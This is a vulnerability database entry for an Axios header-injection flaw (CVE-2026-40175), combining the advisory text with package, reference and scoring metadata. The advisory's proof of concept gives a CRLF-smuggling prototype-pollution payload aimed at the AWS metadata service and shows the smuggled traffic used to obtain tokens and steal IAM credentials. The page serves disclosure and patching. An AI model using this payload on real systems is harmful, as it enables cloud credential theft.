Django REST framework

Vulnerability Instance

Lookup for vulnerabilities affecting packages.

Vulnerability_idVCID-ek49-tuj4-t3ap
Summary
Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain
# Vulnerability Disclosure: Unrestricted Cloud Metadata Exfiltration via Header Injection Chain

## Summary
The Axios library is vulnerable to a specific "Gadget" attack chain that allows **Prototype Pollution** in any third-party dependency to be escalated into **Remote Code Execution (RCE)** or **Full Cloud Compromise** (via AWS IMDSv2 bypass).

While Axios patches exist for *preventing check* pollution, the library remains vulnerable to *being used* as a gadget when pollution occurs elsewhere. This is due to a lack of HTTP Header Sanitization (CWE-113) combined with default SSRF capabilities.

**Severity**: Critical (CVSS 9.9)
**Affected Versions**: All versions (v0.x - v1.x)
**Vulnerable Component**: `lib/adapters/http.js` (Header Processing)

## Usage of "Helper" Vulnerabilities
This vulnerability is unique because it requires **Zero Direct User Input**.
If an attacker can pollute `Object.prototype` via *any* other library in the stack (e.g., `qs`, `minimist`, `ini`, `body-parser`), Axios will automatically pick up the polluted properties during its config merge.

Because Axios does not sanitise these merged header values for CRLF (`\r\n`) characters, the polluted property becomes a **Request Smuggling** payload.

## Proof of Concept

### 1. The Setup (Simulated Pollution)
Imagine a scenario where a known vulnerability exists in a query parser. The attacker sends a payload that sets:
```javascript
Object.prototype['x-amz-target'] = "dummy\r\n\r\nPUT /latest/api/token HTTP/1.1\r\nHost: 169.254.169.254\r\nX-aws-ec2-metadata-token-ttl-seconds: 21600\r\n\r\nGET /ignore";
```

### 2. The Gadget Trigger (Safe Code)
The application makes a completely safe, hardcoded request:
```javascript
// This looks safe to the developer
await axios.get('https://analytics.internal/pings'); 
```

### 3. The Execution
Axios merges the prototype property `x-amz-target` into the request headers. It then writes the header value directly to the socket without validation.

**Resulting HTTP traffic:**
```http
GET /pings HTTP/1.1
Host: analytics.internal
x-amz-target: dummy

PUT /latest/api/token HTTP/1.1
Host: 169.254.169.254
X-aws-ec2-metadata-token-ttl-seconds: 21600

GET /ignore HTTP/1.1
...
```

### 4. The Impact (IMDSv2 Bypass)
The "Smuggled" second request is a valid `PUT` request to the AWS Metadata Service. It includes the required `X-aws-ec2-metadata-token-ttl-seconds` header (which a normal SSRF cannot send).
The Metadata Service returns a session token, allowing the attacker to steal IAM credentials and compromise the cloud account.

## Impact Analysis
-   **Security Control Bypass**: Defeats AWS IMDSv2 (Session Tokens).
-   **Authentication Bypass**: Can inject headers (`Cookie`, `Authorization`) to pivot into internal administrative panels.
-   **Cache Poisoning**: Can inject `Host` headers to poison shared caches.

## Recommended Fix
Validate all header values in `lib/adapters/http.js` and `xhr.js` before passing them to the underlying request function.

**Patch Suggestion:**
```javascript
// In lib/adapters/http.js
utils.forEach(requestHeaders, function setRequestHeader(val, key) {
  if (/[\r\n]/.test(val)) {
    throw new Error('Security: Header value contains invalid characters');
  }
  // ... proceed to set header
});
```

## References
-   **OWASP**: CRLF Injection (CWE-113)

This report was generated as part of a security audit of the Axios library.
Aliases
0
alias CVE-2026-40175
1
alias GHSA-fvcv-3m26-pcqx
Fixed_packages
0
url pkg:deb/debian/node-axios@1.15.0-1
purl pkg:deb/debian/node-axios@1.15.0-1
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1
1
url pkg:deb/debian/node-axios@1.15.0-1?distro=trixie
purl pkg:deb/debian/node-axios@1.15.0-1?distro=trixie
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.15.0-1%3Fdistro=trixie
2
url pkg:npm/axios@0.31.0
purl pkg:npm/axios@0.31.0
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@0.31.0
3
url pkg:npm/axios@1.15.0
purl pkg:npm/axios@1.15.0
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.0
Affected_packages
0
url pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1%2Bdeb11u1
purl pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1%2Bdeb11u1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1vkx-cwua-rqe4
1
vulnerability VCID-7rdk-mw2k-eqdx
2
vulnerability VCID-aq84-8cnz-byax
3
vulnerability VCID-axk7-6q4b-vuga
4
vulnerability VCID-ek49-tuj4-t3ap
5
vulnerability VCID-hq6f-86aj-8yav
6
vulnerability VCID-kgnf-z6ca-tqgp
7
vulnerability VCID-x41s-g5mh-pkdq
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.21.1%252Bdfsg-1%252Bdeb11u1
1
url pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1%2Bdeb11u1?distro=trixie
purl pkg:deb/debian/node-axios@0.21.1%2Bdfsg-1%2Bdeb11u1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1vkx-cwua-rqe4
1
vulnerability VCID-7rdk-mw2k-eqdx
2
vulnerability VCID-aq84-8cnz-byax
3
vulnerability VCID-axk7-6q4b-vuga
4
vulnerability VCID-ek49-tuj4-t3ap
5
vulnerability VCID-hq6f-86aj-8yav
6
vulnerability VCID-kgnf-z6ca-tqgp
7
vulnerability VCID-x41s-g5mh-pkdq
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@0.21.1%252Bdfsg-1%252Bdeb11u1%3Fdistro=trixie
2
url pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1
purl pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-aq84-8cnz-byax
1
vulnerability VCID-axk7-6q4b-vuga
2
vulnerability VCID-ek49-tuj4-t3ap
3
vulnerability VCID-hq6f-86aj-8yav
4
vulnerability VCID-kgnf-z6ca-tqgp
5
vulnerability VCID-x41s-g5mh-pkdq
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1
3
url pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1?distro=trixie
purl pkg:deb/debian/node-axios@1.2.1%2Bdfsg-1%2Bdeb12u1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-aq84-8cnz-byax
1
vulnerability VCID-axk7-6q4b-vuga
2
vulnerability VCID-ek49-tuj4-t3ap
3
vulnerability VCID-hq6f-86aj-8yav
4
vulnerability VCID-kgnf-z6ca-tqgp
5
vulnerability VCID-x41s-g5mh-pkdq
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.2.1%252Bdfsg-1%252Bdeb12u1%3Fdistro=trixie
4
url pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1?distro=trixie
purl pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1?distro=trixie
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-aq84-8cnz-byax
1
vulnerability VCID-axk7-6q4b-vuga
2
vulnerability VCID-ek49-tuj4-t3ap
3
vulnerability VCID-kgnf-z6ca-tqgp
4
vulnerability VCID-x41s-g5mh-pkdq
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1%3Fdistro=trixie
5
url pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1
purl pkg:deb/debian/node-axios@1.8.4%2Bdfsg-1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-aq84-8cnz-byax
1
vulnerability VCID-axk7-6q4b-vuga
2
vulnerability VCID-ek49-tuj4-t3ap
3
vulnerability VCID-kgnf-z6ca-tqgp
4
vulnerability VCID-x41s-g5mh-pkdq
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-axios@1.8.4%252Bdfsg-1
6
url pkg:npm/axios@1.0.0
purl pkg:npm/axios@1.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-7rdk-mw2k-eqdx
1
vulnerability VCID-aq84-8cnz-byax
2
vulnerability VCID-axk7-6q4b-vuga
3
vulnerability VCID-ek49-tuj4-t3ap
4
vulnerability VCID-hq6f-86aj-8yav
5
vulnerability VCID-x41s-g5mh-pkdq
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.0.0
References
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40175.json
reference_id
reference_type
scores
0
value 9.0
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40175.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-40175
reference_id
reference_type
scores
0
value 0.00045
scoring_system epss
scoring_elements 0.13652
published_at 2026-04-21T12:55:00Z
1
value 0.00136
scoring_system epss
scoring_elements 0.33357
published_at 2026-04-18T12:55:00Z
2
value 0.00239
scoring_system epss
scoring_elements 0.46982
published_at 2026-04-11T12:55:00Z
3
value 0.00239
scoring_system epss
scoring_elements 0.46962
published_at 2026-04-13T12:55:00Z
4
value 0.00239
scoring_system epss
scoring_elements 0.46955
published_at 2026-04-12T12:55:00Z
5
value 0.0053
scoring_system epss
scoring_elements 0.67279
published_at 2026-04-16T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-40175
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40175
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40175
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c
5
reference_url https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1
reference_id
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/
6
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1
6
reference_url https://github.com/axios/axios/pull/10660
reference_id
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/
6
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/pull/10660
7
reference_url https://github.com/axios/axios/pull/10660#issuecomment-4224168081
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/pull/10660#issuecomment-4224168081
8
reference_url https://github.com/axios/axios/pull/10688
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/pull/10688
9
reference_url https://github.com/axios/axios/releases/tag/v0.31.0
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/releases/tag/v0.31.0
10
reference_url https://github.com/axios/axios/releases/tag/v1.15.0
reference_id
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
3
value CRITICAL
scoring_system generic_textual
scoring_elements
4
value MODERATE
scoring_system generic_textual
scoring_elements
5
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/
6
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/releases/tag/v1.15.0
11
reference_url https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx
reference_id
reference_type
scores
0
value 10
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
3
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
4
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
5
value CRITICAL
scoring_system generic_textual
scoring_elements
6
value MODERATE
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-13T16:11:45Z/
8
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-14T03:55:46Z/
url https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx
12
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-40175
reference_id
reference_type
scores
0
value 10.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
1
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-40175
13
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2457432
reference_id 2457432
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2457432
14
reference_url https://github.com/advisories/GHSA-fvcv-3m26-pcqx
reference_id GHSA-fvcv-3m26-pcqx
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-fvcv-3m26-pcqx
15
reference_url https://access.redhat.com/errata/RHSA-2026:8483
reference_id RHSA-2026:8483
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8483
16
reference_url https://access.redhat.com/errata/RHSA-2026:8484
reference_id RHSA-2026:8484
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8484
17
reference_url https://access.redhat.com/errata/RHSA-2026:8490
reference_id RHSA-2026:8490
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8490
18
reference_url https://access.redhat.com/errata/RHSA-2026:8491
reference_id RHSA-2026:8491
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8491
19
reference_url https://access.redhat.com/errata/RHSA-2026:8493
reference_id RHSA-2026:8493
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8493
20
reference_url https://access.redhat.com/errata/RHSA-2026:8499
reference_id RHSA-2026:8499
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8499
21
reference_url https://access.redhat.com/errata/RHSA-2026:8500
reference_id RHSA-2026:8500
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8500
22
reference_url https://access.redhat.com/errata/RHSA-2026:8501
reference_id RHSA-2026:8501
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8501
Weaknesses
0
cwe_id 113
name Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')
description The product receives data from an HTTP agent/component (e.g., web server, proxy, browser, etc.), but it does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers.
1
cwe_id 444
name Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
description The product acts as an intermediary HTTP agent (such as a proxy or firewall) in the data flow between two entities such as a client and server, but it does not interpret malformed HTTP requests or responses in ways that are consistent with how the messages will be processed by those entities that are at the ultimate destination.
2
cwe_id 918
name Server-Side Request Forgery (SSRF)
description The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
3
cwe_id 915
name Improperly Controlled Modification of Dynamically-Determined Object Attributes
description The product receives input from an upstream component that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified.
Exploits
Severity_range_score4.0 - 10.0
Exploitability0.5
Weighted_severity9.0
Risk_score4.5
Resource_urlhttp://public2.vulnerablecode.io/vulnerabilities/VCID-ek49-tuj4-t3ap